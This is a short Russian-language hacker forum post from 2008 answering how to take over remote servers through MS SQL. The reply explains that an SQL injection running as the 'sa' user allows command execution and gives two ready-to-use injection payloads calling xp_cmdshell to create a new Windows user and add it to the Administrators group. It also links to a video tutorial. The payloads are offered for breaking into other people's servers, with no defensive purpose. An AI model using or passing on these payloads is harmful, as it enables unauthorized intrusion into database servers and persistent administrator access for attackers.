Кстати видел пост KPOT_find на асечке.ру про добычу дедов через MS SQL тут
Кто то знает как это делать ?
Есть mssql injection через которые можно выполнять команды на сервере,(Нужно чтоб пользователь БД был sa), если у тебя есть такая инъекция, просто выполняешь команды:
;exec master..xp_cmdshell 'net user Username Password /add';--
;exec master..xp_cmdshell 'net localgroup Administrators Username /add';--
на ачате есть видео как это сделать
http://video.antichat.ru/file229.html
p.s: думаю KPOT_find про такой способ говорил...
Последний раз редактировалось aka PSIH; 05.01.2008 в 18:52..